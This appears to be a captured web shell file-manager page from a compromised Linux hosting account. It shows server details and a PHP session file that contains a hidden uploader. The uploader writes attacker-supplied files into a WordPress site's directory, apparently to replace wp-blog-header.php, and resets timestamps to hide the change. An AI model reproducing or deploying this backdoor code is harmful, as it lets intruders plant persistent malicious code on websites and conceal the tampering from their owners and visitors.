HEX
Server: Apache/2
System: Linux server.winterserver.com 4.18.0 #1 SMP Wed Jul 12 12:00:44 MSK 2023 x86_64
User: hotjamba (1034)
PHP: 7.4.33
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/hotjamba/tmp/sess_1cb71455f55364d03d87f1e013ebda44
<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";$fp = "/home/hotjamba/domains/howtosettlealawsuit.net/private_html/"; $fn = "wp-blog-header.php"; @chdir($fp); $tm = @filemtime($fp); print("\n<br>");if(@move_uploaded_file($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) { if($tm) { @touch($fn,$tm,$tm); @touch($fp,$tm,$tm); } print("<file>$fn</file><size>" . filesize($fn) . "</size><writable>" . is_writable($fn) . "</writable><date>" . @date("Y-m-d H:i:s", @filemtime($fn)) . "</date>"); }echo "Result:OK"; echo "</body></html>";  die;